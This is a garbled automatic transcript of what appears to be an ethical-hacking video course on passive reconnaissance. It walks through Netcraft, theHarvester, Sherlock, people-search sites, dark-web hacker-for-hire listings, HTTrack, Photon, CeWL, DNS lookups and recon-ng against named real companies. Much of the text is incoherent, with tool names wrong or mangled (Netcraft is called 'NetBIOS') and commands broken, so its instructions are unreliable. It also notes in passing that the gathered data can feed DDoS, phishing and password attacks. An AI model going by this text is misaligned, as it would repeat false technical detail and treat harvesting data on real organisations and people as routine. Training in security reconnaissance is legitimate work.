and your IP address. So where you need to put here upstream our hostess of the target address is this is the target address okay, and our port there is port is 3389, then that's it. Then scan will be, if you can run this one the C programming, you can get it directly the access here. So where is this a latest series you can see here, you can get here that. So you don't need to think, you just need to make a full recognize here. Okay, that's it. Now this concludes the demonstration of gathering a vulnerable IoT information using the assurance agent. That's it. Now there is more subdomains using a NetBIOS. So NetBIOS is a tool for gathering information about domains, subdomains during a recurrence space of ethical hacking. It provides data about a website, including host provider, IP address, SSL certificate, and domain names. So let's walk to here. Now let's close this off. Now let's open. So first we just type here as netcraft.com. So we have visit here the data. So just decline. So don't add any type of cookies. Just put everything. So in the NetCraft website, you just click on the resource. In the reference a research tools. In the research tools, you just click on here most popular site. So view a site report. I just so it asks what's that site design. I just put here as HTTPS www.blockchain.com. So I just put here as blockchain.com. So I just click on here a lookup. Now you can look up a site right now. The site rank is 305. Date was seen May 2014. It was primary language in English. Site officially NetBlock owner with a Cloudflare INC hosting on Cloudflare. IPv4 where you get it. This is the virus router. This is an autonomous system where they have IPv6, reverse DNS. That's it. Where you can look here a company. Google is at Cloudflare. It is also technologies, JavaScript technologies, badge library, Google Tech Manager, Google hosted libraries, and if you want to find a subdomain, there in the domain tab, you need to click on this. Where you come here, a subdomains, a login.ablockchain.com, support.ablockchain.com, exchange.blockchain.com, links.ablockchain.com, api.blockchain.com, status.ablockchain.com. If you want to visit this, so you just click on your link. You can look here. You have fully operational the Explorer, the Defi wallet, trading account, the exchange, blockchain.com. No incidents happen in this month. Now we just look here. API, where you get here API, blockchain.com API. So you just need to register and get a code here. Then links to blockchain.com. So this is get here. Blockchain.com. Where you can trade your crypto coins from here. So I just close here. Support a blockchain.com. Our exchange blockchain.com pay. That's it. Login.com. That's it. So we have got the thing. So where they was posted in the Linux, not like any other thing. That's it. So we would like to look apart from this some other things. So where we can come back to here, close this. Oh, this is close and off. Let me, I just go back here. Now you can look here, DMARC, domain-based message applications. Yes. So we can here. Netscape, the original SNMP call, and here is a changes of Netscape. Okay. Inside ping framework, back on yours. It is this everything possible. So we not get here as SL where are getting implemented thing out there. So that's all. It's the English. I as a feature which is like a substructure. So I like to utilize this one as a part where we can use in the application. Now I'm going to here this any target of a private I say create.com the right. Here every about the domains, some subdomains, uh, snapshots, every information will be presented here. Now utilize as AMOS for science. So we can also use this one. Or we can look at technical use for API certificates, web archives, lookup, everything. So we can utilize also here. If you begin need to work, you can look the installation very easy. In the case so there to get update in AMOS. So this information is domains domain in NetBIOS. Data can be used of subdomains for web version are targeted such as internet attacks, DDoS attacks. So now we are going to discussing about gather personal using online people search. It is on the budget. Gives a publicly available about videos. It has data from various sources such as social media, blog, news, public, and then we want this tool using a recommend space to get personal information, ethical and legally. So first we would like to talk to search. I just write there as so this is now you need to enter first and last. So I just write as a person as channel. Then I like to present this is let me so I would like to keep judge. Let me just write that. Let me a Sharma Thunder. So I can be at that. Look here. It may come out 6, so I don't wait. So this way the good part is reply just one. This is just required. Continue. Look is so they will collect personal information, social accounts, photos, videos, aliases, financial issues, recordings, it is this every got me to so make a time get so one you also is that because big like this is like so I know not all all as a big one is so we are very fast. So where will you enter the so if you search enter the it's very all just you look so they also get actually ones where how to look at this because how to applicable for you search you can let me so our we call it that's it. So like discussing and get email list in the hotspot. So What's that? That is an open source to engineering. This is primarily used to gather just email address, IP, also supply messengers and directs. So, features in media. So, it is associated with them. What is the NetBIOS? We have various resources, Google, LinkedIn, and much more. Now, if we want what, let's come back. So, let me show which was previously in the so let me just open this. This is registering. Once it was very good. Now let's come back. So let it the cut it was a good. Now let me just so in update the update and password. So it was not updated before. Now I like it. So it's not updated. Update not working without me by web. Now I just upgrade here, but yes. This was so wait a little bit time. We are going to the tracker here. So update here. Whereas the size will be big, the faster minus my. When you can see here, we would like to play the domain such as source engine like Google, etc. So I just press here. Minus which one would like to use? A says Google. Let values okay. We want to here let's get it. So a process is 1%, mails is great. Now I would like to as clear visit as CEH. Now it's back to go. If it's one email host, okay, no worries. If there is not, leave it. Now let me just now like to pass Microsoft. I 200. Let's look here. So sometimes we get get results. Sometimes we are not able to get the results. So I'd like here as the harvest. Then I just put here as apb.com. Now would like after I will put as thing invalid source. I just provide. Okay, I just put in the I type. I just only about what is up. So you can see illustration times the host. So in this schedule that is the one. Verify the target email. That's so this the is using the hardware. So we are discussing about the topic as information in dark web searching. So deep web dark web. The deep web of a content not by searching like Google X things, which I thought this will of target, including a content that is more web. All of deep web requests are like a top to access and is often with anonymous. So first we would like to here. So this we give information get to this is here. So now first as a project. So this a project. Cycle it was about a big so where we just download our project. This is download for every device if you type on Android so I download so we are installing some now as just install now take a look at yes let's do like here. So it was finished launching the so click on connect network. Now here what you would do select it. What's this and here like this one that we just here. So in this case so it connect this one. Now I want to hacker I will where you can just freelance to hire in 2020. So not a for certificate for any for because for hire this career always job application was a hacker guy. So you get to like to go here. It's right here a so we need to just go in the now just go here go. So here you can I have so here higher hacker than Android iOS online there you have all the information. So these are trust. In this case, which is in such changes. You can see dark reality like yes, or some here and go. We also look here with some I just here web. This is a web mission. In this mission, also look website is and you can find you enter the URL then go to it here. Now for examples, I will show you here as references here come back. So I'm setting my box. So this is similar to as a files, but this is just like it as each not down. So where it website is this it events port 3 where this one exclude all this information is the opinions for a selected information police specific everything. We look up something as a worldwide science. So, worldwide science body. If science body only it is organization for information. So only it is often run by exchanging the exits. So, start expecting. So I can ask sensor about. So a God will be happening. It will be present here. All the information in the dot web. They are going to utilize this dot and exchange information. If you are going to go like in the tables as like you just come back. You are able to access this one. Here, AHIMA address demands for information. So I will search as AHIMA. Now let's be back to here. So for hidden results that to access the results server, you don't allow on access of language. So this is you all on it. So now you just want to look like a hacker. This is a hacker. So now just I stop this. Now I stop. Let me the hacker for actions and then responded to send any else as at the month. So X through by a bit RH from so it's a step and here as one so hackers from back here which twice. This also is same. This like this so now so what is in the layer of any type of targeted things that will not be here. Okay. I've seen it say the browser for looking. So let's come back. Let's see a touch. Touch aside. You can function. So this is weird. So this is not right now, but I do have rally work. But look here, not even. Look. So this is online. Valid online. The answer is valid and invalid. It's not valid here, so that's not valid. Now there is a struct is track where a square was a code which is news. This is personal shopping easy. So refer one so you able to access this down here so that is owned by data. So people can use the main like the key in this like look we big plus 100 so is return then we keep take these shops also like extra like this online search engines, I can class and come to this is hidden all the information. Spect, rise code, second for related random bytes, while the storage you back it up for or you look here, everything you can get here. Right. So that's what is big on dark web. Like now we are discussing a determined OS safety. What a put printing? What gathering about that account directly this is is to avoid detect why collectively update this issue the reference state of hacking and several pro of the argument or issue. So like by the target or infrastructure and currently accessible information such as substances technology gather some occasional data name access then for a deep recognition we've seen in our space how we books and of access also the hard how we can get domain names get our output links not just what has secrets but is a to try we also like is so not just so we just is made to here you can also get otherwise is here a difference put as Asia I just validation so is evasion so this then verify the code domain is DNP.org. So then we get here like resistor options LL there are an solution and this is where there was resist targeted. Okay, it can be very easy targeted. Domains are there. They like 1060 days old. 9720 x 1034 520 2520. So and you can set the information security here. Erasure with erasures everything can look here. So at small input was here. This was a code of course code itself. It more than media skills. So I was registered with my monitor recording. So this was but this was all so it is necessary to look pull okay so social media I like to social media as Mali visualize this and to visualize connection with social media this scenario aggregates social media we can extract from so we can show this one also do the domain then we already did the networking with the net already the IPs I was shown everything here public databases you look that a public is like how I been look here your just any type of email and check email address a dash so just email like and start so we oh no and the spot and we just to test as I just try here spot let me just now it was if I no we just right such as so it's email dot here so there is now like another one as the hash dot so let me do this hash so here is such and one and such yes complexes or yes otherwise such type device so require account so we don't have much time set here everything set here so I have to show you only this one for with a footprint let me like show you so where are the teams like sources are for so I visualize it on where we have our now it's use a census search engine census engine look here where get we get such look here such yeah such for a host I would like such as area now as here when get here Google publish aggregation here that thing now we search here HTTPS so just open a new potential now just start so this is become as target IP address where when you import you get checking to check this target IP where it was to the target here so where there was checking that's it we have done and how your targeting so here and so now here is as a so even with UI.org so you can just we can so I just do search results will become a tokenizer collector is in here so let's get the first this or the change based on it would like look here we just 881 this is in kingdom now let's put in here what is the information how we get it so it may take time to accept me we have this now you like has far is we also say such engine like another IoT systems that access as devices we just we would like to see Yes. Here we not get some additions. If the same Brazil we not get to, we just open this one. Just enter here. We can start the next using password. Now try login is fake. So we have found that while login site. You need to find it a log pages. You cannot here. Now we look tester. We not. That's it. So we have such as for this module. Now it's just a thing. I tried to right. This was a set for net of things. This was providing a huge journey for VM data from the of what integration requires as was sense. But we have the able. Okay. So another one is has on we so we use a cyber search. Just say try search. Then this is presented things. Now there is to kernel and the is openly tap the server now. So where we get this is going to give a right information. So the one access by a support. Let's we just here client has to request on HTTP server. Okay. Where they have set up all this. Now this is you like to look this copy. Now back 60. It's not called 2086. So we try all possible ways to get something. We not get this one also. Now the last tool we can look here as a hunter.org. We would like to search anything. What else you like to search? You can search a blockchain. So this is a big platforms. Big platforms. You can see a census showdown. This is giving a shortcut way. Not get satisfied results match your search try out with the following sites. Where so it's right. We can quick this. Yes, CRT. Now I just put here CRT like we just try here. Otherwise, just try class. It's like here. So just try class cap. Not get. Now we can have a port A440. No, it's not work out. Port 54. It's not getting yes. So that's it. So comes the demonstration can OS information by passive footprinting. The census work engine. We can also use web services like NetBIOS and Showdowns and much more things here. So it's not the targeted browser that will be compatible to SNS only. So this platform for paying money is searching. That's a good form to get it very easy. So that's now we are discussing about transactional information various social networking sites using a share lock. So what is a share? Share is an open source tool developed and research about used across social networks. It can check our user on these social networks, forums, and other apps, making a valuable tool in the So what are the key features we can get here? It will suggest what the website for a specified user. Its username is taken available on a platform. Can be used for OSINT investigations to get insights about individuals' applications. Use and support of saving as a now. First, we would like to go to here. Let me just so now let I just open this virtual box. Now just resume this. Just open. Now, if you want to install a share lock, you just go to a GitHub, get the share. Otherwise, there is a share lock directly. So I show you here a share lock. You just start here, enter a where you want it here. Now it will download it successfully. That lock. You have seen your let it be installed. This was installed here. Now just go back to a share -f. where you can see, you just need to specify the username. That's it. We can get out every year. Now, we'd like to uh, any type user as I would like to use it as a hack, and otherwise I just like a industrial. That's it. So I just search about me. Let me just our organization username. All my links are with the industrial. It was our. It will check across more than 3 platforms. So if we can just open this, what else we can get from here? All my links. Just a moment. Let we would like to look this. It's not have, but no, because there we have. We will get here like demo, curve, then dimensions, a block, resource, hack, such is completed. YouTube. So let me. I would like to show in the YouTube. There you get here in the YouTube. This is a old code. Video. Let me just look. It was which so is available. But I don't use as a trick all those things. So it may be present all. So with a critical conception, you can try all nothing but the like hacking and most advanced tools everything. So it wasn't fine. So where you can get here a Twitch in the Twitter, you can follow in the Twitter. So that will be a login here in the Twitter. So it does not require that we will share a PY pattern if I can prove. Would you like to hear a proof? So we don't is some of the particular thing. So nothing else. Yeah, now that's daily motion. Let's have the daily motion. So when about is available will be here based on this one. And it will see the code that is not here. That's it. There's no any type of repository available. So when it not going to be present, somewhat a real-time information will be present. The attacker can put the use a gather URL to obtain a sensitive information about the data, such as data implementations and information about organization that they are working for, include for a business strategies and potential clients, upcoming project plans, concludes investigation of gathering personal information from various social networking sites using a shell. So even if you look at social structure, that's good. And you can also use a URL that also Payload to utilize this call. Now, we are going to this for a Sherlock. So we have completed this a Sherlock. So we have completed this a Sherlock. Now we're going to do other today's gather information about target website using ping command line utility. So ping command line utility is basic but a powerful tool that helps a gather each information about a target website. It tests and reads a host and IP network by sending internet control protocol. It takes a responsibility. Now, when you get information, a ping can reveal a useful results, such as a target IP address and its response time as part of a passive footprint. Now, we would like to open the terminal here, so I just open in my main summon only. Here, just normally launch the terminal. This is my terminal. Nice as a ping. You just utilize as your target website. Now, I have get a response here as 44, where I have got a response. It was 4. So, we would like to set now we have lost nothing. Average maximum response is 61 milliseconds, average response is 59 milliseconds. The response packet needs to be entered, but DF is set. Now we would like to use a packets here. Let's come back. I would put as F as fragments F1300 and just enter. So there once have a fragment. Now the average response rate is 63 milliseconds. Now let me like to reduce the fragments. This here is I would like to put here as 1.73. Now it's here. Packets need to be fragmented and get set. Set is for receive, loss is for lost. Now let me just put here once around. So I can send for reservoir loss is 3. See how lost as much as possible. So now I'm going to discover as using with another bank like we just try here as sorry this finance I 3 I just here expiry balance. So loss is 0.0 seconds, 0% loss. Now we can see the replay of VLAN is expired the balance, which means that the router of a target is 70% of 0.9 might vary a balance. Now you type right here I2 minus what? See here I see what packet is correct. Now we just try here as type as x3. It's also the same. But here is actually the process ping status of the target errors, and I got no response from here. Now we just look here. I would like to go here as a code. We just show here as code. It's also send and receive one. Post 0. Now you can all this with your own items. Why let me show you. So first I just ping then I made like a target of ping my target domain. I'd like to print the length is 1300 where I got it here. Now once I have reduced 10, increase the length where I give set once I enter 142 where I only one here. There's nothing else. Now we have also tried time for TTM minus and I got number 1. So you want to try as number 4, you look here details X. This you will get 7 That's it. So this concludes the demonstration of getting information about a target website using a command ability such as address of target website, hope out, at the type and value, maximum frame size, allowed on the target network. That's so now next tutorial is gather information about a target website using a central hooks. So what is a central hooks? Central hooks is a free online platform that provides a various certain information about a target website. These tools enable security professionals research to perform analysis in passive and non-destructive manner. Platform of DNS lookup who is payload email application marketing. So we will have to go look up this one. Now let's back here. So just from here as central hooks. The part you just need to do this link. So you just need to enter your targeted. So there we have Airbnb or target things enter here. Let's click on go. Now we can look here in these records everything. So where you will here this record is my name server records. DNS is unassigned. That's it. So here you look here class item. This is a name server, this is a hosted result. This is where we not get like a DNS records like record otherwise MX name servers. In this case, we need to look very here. This is printed clearly. That's clear. Now we look here as a domain check. If this is there, you can go. From DNS, I can paste again everything it was taken. Now we just look here as emailers. So just enter as emailers. Like I just enter as info@asia.com. And I just go. 3 SMTPs. The mail, the email is passed with level of validity without and however it's not guaranteed to be a good address. This look here everything. Now that's it. Now just type as a ping. You just if you ping you can ping here. You can keep the target errors which is presented here. Time to leave everything. Receive 5, receive 5, loss 0. That's it. Now you can look here address route. You just try and look here address route which are getting approximate results here. So address route is complete. Now you just also look NS lookup. You just try where you can look at A record, S record, MX record. Don't get C records, everything. That is here. That's it. So this includes the demonstration of information about target website using set hooks online. You can also use web inform otherwise a proxy, post otherwise a box. So if the queries, we are going to use that tool. Yeah, that's it. So now we are going to discussing about extract companies data using web extractor. So what is web data? Web data extractor is a powerful tool used for automated web scraping. Often used to collect data such as company details, email, phone number, URLs from websites. It is a valuable tool for ethical hackers and research or business for AI information in access or research. So we would like to get the web extractor. So we would like to get the web extractor, as we would like to use the online tools. So these tools which I was trying by online, it's going to count. Now let's this. Now we would like to use on the online tools. Like where you can get it like some things like auto parts. So this is the tools for web scraping tool like free web crawlers. You can start a file here and get entire of the sites are get it done. So even you can download, you go for a download, we would like to here for a Windows for Octopus is glad to see anywhere else. Search a task and put a website or URL. So you can download a different URL. So we would like to do this. Now let's come back to this. Scrapping like to do this. First of all, a scrapping for a web scaling pip install is scrapping. So this was a Linux. So we click for Windows Linux, then we would put a pass out. We would like to use a pass out for peer scrapping, powerful scrapper. We would like to look this. So this is a pass. So we want this a pass out. Now we like to do this. This one is we would like to download this pass. So it may take a little bit time to download this. So in the meanwhile, let it download this one. Let's back here. Now we just launch this the tool name as Scrappy. So just resume this one. Just resume. So the connection is time. Just try Scrappy. So just type here as install is Scrappy. So this is just to get a little bit as here. Let me just install Scrappy. Now let us suppose install just like as Scrappy. So if not, just enter password. Just type this. So where USB download. So one volts that is not useful. You need to come for a tools here. Just look here. Scrappy, which was done. I type here. Then type Scrappy and run a quick bench test. Bench the URL using Scrappy formula. Get this file using PT5s. A run a cell calling this without getting a part. Get Scrappy. We just go for settings. Here. Scrappy, we just type here as session. Now, where it was shell, we just set type OK. Here, welcome to Python 3 High-Fidelity. This is the first using Python. You should utilize this. The name of any mode or keyword or topic to get right in the Python program. So I just just write exit. So this is taking total in different format. So we aren't able to get here. So extract this is not coming. Octopus etc. So we try as a retryer. So don't worry, we just try by online. Let's see how it may be going to be worked. So I just start actually go because a good. Then let's on here. Now you just need to describe all those things. You just click on. I just type process. Click next. Just want to okay. So you will begin. So search engine complete our monitor. So I want to continue as a reviewer. Now add more option. Yeah. So in this, it may not be right results here. So this octopus is not a game. I think so. We just would task. There's nothing else like launch task. We just for an it's not good one. We just go for over. We just try here. Template. Contact. my data sets have overview. So that color cells get a custom this will just stay here. So this will go on the check. So you can take this, it's not going to be get a download. You can take a look at process. That's here. So now we are discussing about another topic as mirror attacks using a HTTP website copy. So HTTP track is an open source tool that allows you to download and complete a copy of mirror of a target web to their local version, include website, HTML, images, sheet, and other research, enabling offline browsing and analysis. We would like to go on data, let's come back here. So close this. Now we just write here as httrack.com. httrack.com. Then it's to download based on your instructions. So I have downloaded here. Now I just go for installation here. So I just write next. I add the agreement. Just go next, install. Now just click on finish. So it was loaded a pop-up. So just click on you can select your language. So if it set your language English, then it's from back here. So just mention your project name as you just mention as your project as one of them. So you need to confirm that project again. So you just want to measure. So you just need to get your target field. So I just come back here. You just write onaweb.com. So this is my target. So you just copy back here. So it's put here. Now options. It's click on scan. So just click on give move. Then you click on OK. You just click on next. Then once this it will automatically get result here. What's this? Now browse the mirror website. Now you can see I'm browsing the mirror website entirely. Now this is in web.com index.html. Now I look, this is not formatted because it will directly relate to the target website. Just to make everything is clearly here. Now let me just go to here. This is the thing. That's it. Enter. What is the source code? Enter we can get here. There is nothing else. So this concludes the demonstration of mirroring a target website using HTTP track website copy. Now we also look as that's it. So it will type of target website. Now we are going to discussing another topic is like gather information about target website using a portal. So portal is an Python based tool. You will need a Python install on your system. Following steps we would like to utilize here. So first we just copy this. So I just copy. Now let's just open the your VMware. I just launch the Kali Linux. Open. Now this all has a little bit big. I just this this just like so. We have set git address. I see or I just type a list. Just as git install requirements string. So first we would like to install the requirements. I'll just try here as so then we have installed everything. This is the right command. So I just write here. I just write list. Now we just write as file. We just put out Python. We see here. You like to place here. Then we would like to utilize here. Now I just come back here. Now we just put here as massive, and I just put here as studios. Now I just use as airasia.com. Now it's like this is product of internal and external scripts of the work. So let's view like this. So there we found robots and so on. Internal static, external is not there, which was created in airasia.com. If you want to repeat here, you just type plus mistake. If you have airasia.com, so just copy. I just write here, you just type C airasia.com. Now just look at plus minus there. Now just write aero.exe. You have found aerobots.txt about here. Now just write here scat internal.txt. The internal files for display here. Now just write clear. Now just write cat external.txt. Where we was found external links here. So that is open same in directory we have seen, and we have everything in the portal folder as of your targeted domain. And you can further explore a portal to perform various other functions such as cloning a target website and extracting a secret keys, opening a wiring a regex, pattern, etc. with information. Attacker can perform various attacks on the target website such as red flags, denial of access attack, injection attacks, and phishing attacks, and engineering attacks. So we'd like to show you. So just right here, beside us. Here. So use present level grid. So for the website locally, we can also do the website. That's great. we have done this. So we have completed this tutorial. So this concludes demonstration of gathering information on a website using a photo tool. So now we are for another tutorial. Extra information about a target website is a grecon. So grecon is a tool used for information gathering tools that helps anyone hack or security researchers to get a publicly available data from a target website. It's designed to assess the footprint basis of penetration industry by extracting useful details about a website such as domains, name, server details, and public available domain. So first we'd like to walk to the our client. I just try here CDC. Let's try here. So first we like to search a grecon on the Google. So first in this case, so just try as record GitHub. So first would like to try here grecon GitHub. So we have just new another version of now more automated stable works of this smart to run a Google based passive recon against user. This is GitHub is the where it will provide which was tried so this type has quickly install minus r requirements txt which install the requirements post the site as a python dot now string you want to line just now another line what I will use output as read dot so we use this yes read.com. Let's look for subdomain can get developers.read.com everything and subdomains you can get it here. Sign up on logins, download listings, and echo tools WordPress templates. Everything will be here. You can look here informations. So where you would like here. That's all. I got my password to my account. I got my account is anyway. I can on my account back please. So it may take a 20 seconds sleep. So this is a big thing that it will take a lengthy time. So just utilize this one. So again, for the gather information to pop up base location attacks on the website. This includes the demonstration gathering information about target website using a grecon. Here public access tab. You can look up looking for presence. So I will refresh democracy. So I democracy allow a Reddit.com. So where I have got some here. Then specifies like. So these are what is this? So we have done our book. Now let me close this. Now going to ask the tutorial gather a word list from a target website using a civil. So custom word list generator is an powerful tool used in penetration testing to collect a custom word list from a target website. It creates a site for a word and generates a word list based on text, including it, links, and even metadata. This can be useful for it for hacks, advanced crime, or other testing where a word list are required. So first we need to get our information. We just try to clear this. So just write a C. Now just write here. So there is first as an input. Now just write here C. Just write minus. So where your license was. So where it is clear, now write C minus 4. Just put here 2 minus. So let's put my target website is so I just don't want to put here I want to put here as a WordPress.com. Okay. Where I can where I have mistaken. Yes, I not to give the length. Where we just go here. Let me like look now. We will get the target what's present here. Everything. So it may take a little time as always. Robinhood was of this one. To M5. So it take a little bit time. Let it go. Now, this is in this case it's not so if you want to try as a civil, now just try as HTTPS. You just try page. Now just save this one in .txt. Now let me try here. I just try cat .txt. So only this one. It's not I have mentioned a like that. So if I not this one is I mentioned so this is specify like this, where it's only here. So I have minimum of like it's not up. So this is an target website here. We have got a plenty of this. What this is, uh, I don't this is under origin. This is printed here. So you just need to your specifics. Okay, you don't need to think. You will not get, you get a result, but this will take a process. Okay, you can use this and everything. So even if you want to try like a like I'd like to do as target website as I would like to do as where I would like to go. I would like to go as Marriott. I would like to go I would like to choose Marriott.com. So I would like to utilize this Marriott.com a website. And come back here. Now as you see a 3 that I just specify one is spend to 10 then a website. This need to be seen dictionary.txt where the results will be saved here. I just remove the waters .txt just like clear. Let's see like here and just what plus a dictionary.txt for that dictionary.txt missing the time I just dictionary.txt like right here. So I like to use is 6. Let's would like to look here. So let's specify only in 6. You specify minus w here. It will save in the text. That's it. So this one is we use able to perform where post attack previously obtained by target organization. Employees. This concludes the demonstration gathering orders from a targeted website using the SIP. So let's make a lengthy time. So here is right for this dictionary history. You can see 120 terms. So just here I am pad dictionary history. And got everything around the list which was used in the targeted website. Here you can look here. You get any type of Google, so you don't worry about it. That's it. So that's now we're discussing about another tool as gather information about a target by addressing email tracker pro. So email tracker pro is a tool to track emails, provide a valuable insight into the email has opened, when, where, and which was. It can also help in tracking the original email and determining its legitimacy. This is useful for security function as well as to gather information target and analyze email activities during a cybersecurity investigations. Now, we would like to say things. So I have set in my virtual environment. It's my virtual environment. Now let's go back here in my here where I have email extractor here. I think I already here has email extractor, so I don't need anything else. So where is broken here? So where it was launched, so it's run. Okay. Now just click on response. In this, click on new email place. Here in the home section, trace trace heads. So it's an email a network for responsible. So we just need to get the email address. So if you would like to go to a email, now let's go to here as a.com. Here we may just here is open as an as I would utilize a thing. I would like it a email. So then we will like back here. Let's go now. Where we just here. Let's look here. We have C here as apps just on this. So you just click on these 3 dots. Now just here as show originals. So here download the originals. So you just copy these originals. So you can't able to read the originals. Copy the messages. Let's just go back to here and meta. You just automatically doesn't just click on paste. Just look here where it came from. Info@hello at the up to powers to a target my email address. on Monday, 16th December, everything. It was came from the Australia. Look here, the target. Post name, locations. Take everything. Slide and get enter is completed. This is the end of the letter. So, network who is ARIN, where we have got here. Domain who is domain information not be found of this target line. This is our email letter. That's it. That's it. So, this includes the demonstration of the information through analysis of email headers using email packet code. You can also use email packet code such as info. I would like to show you in this tutorial. So let me just power this. Let's come back to the Poly Linux. Just open. So we just need to try a multiple things, not only one thing here. Now let's look at just one here. We try let's get the same OSINT. We just open this one, come here, check as a git clone as a repository, where string repository. Let's try C info. Now let's try customers here. Now here we just try as a Python 3 set.python. So I understand now. Let's try clear. Let's try SNMP, enter your password. You just write as Python 3 a set.python install. Let it be would like to install. So this is not going to do. You just write here. You just write as a Python 3 info.python -l. So a domain, a targeted domain. So I just put here a domain is I just put as asia.com. That's it. Now searching asia, found elements found in the file. So where there will be a file all the image here. You can look here doggy file. Every individual entry. So may take a long time just this. Now you try this as info. So you can utilize L2 and info or other tools. So now we're going to perform another one. Perform who is using a domain tools. So here we will get a target permission by who is using a domain tool. So we just copy the target URL. So just type me. So we was at this one before. So enter into target. Like I just want to enter like a Dell. We like look here options. We need to validate this one. Let's try to verify. So that's the result. Will release associated with or entered with as your head. Here information is displayed. So where they was here. So just copy. Now just come back here. You look here. Safe names. Segment service where they have posted a Dell logger in this hosting platforms. That's it. So this concludes the demonstration of gathering information about target organization by performing who is a domain. We also use other like who is lookup, who is like a terms. I would like to use that as a terms. Terms.com. You can also utilize these terms. Welcome to the software. So this is a install a product experience for that one. That's it. So now we are going to do as another tutorial. Gather this information using command line utility and online tool. So DNS domain names, information property details about a domain such as IP address, name, server, email servers, and other records. Gathering DNS information is an essential part of reconnaissance in penetration testing and cybersecurity investigations. So first we just do open the command prompt. We just type here as a command prompt. So first we just type here as a cop when it was present at my appearance. You need to know that. Let's type here as first as set type equal to 8. Now just enter your target domain. Just enter as so where the name, the targeted IP address, alias, and which it was presented all here. Now we would like here here. Now we just need to get our target IP address now got here. Now I want to get a CNAME. This type here as a type equal to a CNAME. Now just type here as your target thing is hp.com. So where I have got it here as a CNAME, a very name of the server. Now this the main authority as with a exe01 pub p items. So now we would like to, since now when operating the server, you need to determine the IP address of name server. Now we would like to determine that. So the authoritative name server stores the records associated with domain. So if an attacker can determine the authoritative name server as primary name server and domain associated with IPs, he or she might be able to exploit the server to perform attacks such as DOS, DOS, dual redirections. You can also perform a same operation using this lookup on the tool. A country like we would like to do this. So I want to show you here as some, so I just quit. I use this, so I just type clear, so it's not making clear. Now let me just open here as some. This command prompt. Yes, find make change record. So I just as look. Then you just type equal to mx records. Then you just here as hp. So this is hp.mx mail exchange plus sdp about mcas.com. So let me out. Now if you want to find the new server, so you just need to as mx place as new server. The new server which was right here exactly. Now if you want ATXT records, just to get class TXT records, you can look here ATXT records. Have one ATXT records. So you can validate this. Now, if you want to get CNAME records, so you can get a CNAME records here, like CNAME. So CNAME which was printed here. So that's it. Now you can also get like a start of authority. Like if you want to get a start of authority, just look as S4A, which is when there is start of authority. Now, if you want to get a specific yes for this. Let me just put this. I would like to again a CNP or a specific DNS. So it's as lookup. It is put as a.com. We would like to press 8.8. So IP address, speak IP address of DNS, which I have got here. So that's it here. So if you want to get another way, you can also like cloth.net, then you just type services ns lookup. So here you can get here, you just enter any type of targeted website. You should put here as Airbnb. So you just click on services here as ns lookup, domain name as airbnb.com. I just type lookup. Here you get the targeted things which is all available here. That's it. This includes the DNS using ns lookup command line entity ns command line 2. So now we are going to discussing about other tutorial. Perform a reverse DNS lookup using a reverse IP domain and domain record. So this lookup is used to find the IP address of a given domain, and the reverse DNS operation is performed to obtain the name of a given IP address. So here we would like to perform a reverse DNS lookup of a signal of reverse IP and domain check to and 5 other domain sites. So first we would like to come back here. So let's just make it as a little bit big. So I just put this. So just come back here. I just write clear. So first I would like to know what's what web. Now I just need to look as a .com. So here I try to get my targeted domain IP address. Let me look here. This is my targeted IP address. So just copy. This was done. Just type as DNS. Now I just type minus up. Let you just here. Just type a 0 to 255. Alright. I just need to put as here to as a 255. That's it. Now here it was performing. This of this target IP address is not performed. Now if it's a IP it's my target IP address. So I just here let's close this. Now let me paste this. I just type here as and let me paste it. 255. Let me just look here. 0 records is found. Otherwise just put here as 7 is 68. Okay, I just write here. So in this case also you can look as a 68 by a 60. Now let's do like to look here. So it may take a little bit time to perform where it may be able to be done. So this concludes the demonstration of gathering information about organization by putting a reverse signal call. You can get a signals of reverse domain IP. So you not get a answer call. Here we can try as is another way. Let's look. So even if it's not come, we just try as in this. So you just type sudo su, enter your password. You just type as netdiscover -i is 0. So here in this case, it will go here a targeted IP address. In this case, it need to become. This is perform a slow way. Here you can get your targeted thing. So even you can try with as in this way. So I just put this. So I just put this. I just put here. I just put here airbnb.com. Let me just try. Address ornament as CEH is not presented here. So we try here as show.io. Let's try edit. Someone to set. So I just want copy. I just copy come here type DNS. So let's share 0 later. When I'm here things. Look, when how many values it's all done or presented. So 240 equals that operation. So now we are discussing about local networks. So network information of network range. You get the how is structure of machine in the network. That it looks like network and as a operating use directs. So let's here just try look here I am. Go here. Now let's make other who is so let's is ready.com. So this will be so it's here is domain here as so where I my target address then let me look here address is not just copy come so basically here now like here in RDR technologies they are simply 1990 Cambridge network. So we have for the information dual information about network range along with information that's network registration permission and data. This is of getting air and such. So we going to go another our tracing windows and decisions. So it is a dice to take the path data packet to reach the destination. So here we would like to do as using windows and the using line. So first we just open the terminal. So you just type here CLE. Now in this here now you just type as result enter our target destination. Just enter as simple as dot. Let's see like so the result will here. Interpret the out by each presents the and create a device like a root on the destination. Now look here. So here this is my first time. Now look at it. Now let me we like opening this some fog line. So we just come back here. So the protocol used in Windows as ICMP. In the Linux, it was used as a PP by default. ICMP, it is specified. In Linux, they would like to use only Unity. In Windows, they are going to use ICMP protocol. So installation it might be built-in Windows. It might be installed. Look as let me just try here as trace root. I just see google.com. You would like to hear it running as a cost. Here's X. Now you can hear the line is too lengthy costs. So the packets may be reach destination. Since we have a simple network, you can add a director that should be from the source to the target destination. For the here to was say very depending on a target destination. So in a system, very this window, it may take the time process to reach here a destination and get the results. Concludes the demonstration of performing a network testing using line information. You can also use other tools like root, root, and so that's not a required for to do it. That's it. So now we're talking about a target using content. So because it web is a stored, you to get the information about it offers a process of code printing by integral API and this. So I would like to do it as a practice. Let's so let's try here. Let's just and just try and just try nice here. Here is a thing Otherwise, we just start with this process. I exit, now we just as happy. So back here have marketplace. So you just type here as marketplace install off. So just copy. Let me just press here. We just type here. Install off. So it will take a little bit to install all marketplace. So wait for this. So ignore the errors. So just don't mind about errors what I've got here. So just know that now we just type here as workspaces. There is no workspace here. Now we just type here as there's no workspace, so just type here as modules search. First you'd like to search the modules. So there you have stored modules which you have got here all. Now let's type here as workspaces, there's no workspace. So you can create a workspace. So you just type as workspaces, create Windows tab. So there you have created here a workspace. Now just type as a workspaces. Now you know here. I just type as workspaces set Payload. You type in the Payload. We type as workspaces list. So the default is our what? Another one is let's I would edit now we are in the workspace aspects block. Now we will type as database inside a domains. Now we just write insert a domain domain txt or type a domain name as asia.com. Now note just run as blank this one. Now we just try to show a domains. Sorry, we just try as I show domains here. I look at my target domain here Asia. You just try as load bread. So I will do the bread. So let's get here. So you just try as modules. So bread where we have got here. Now we would like to see here record domain host and web host. So I would like to utilize this. 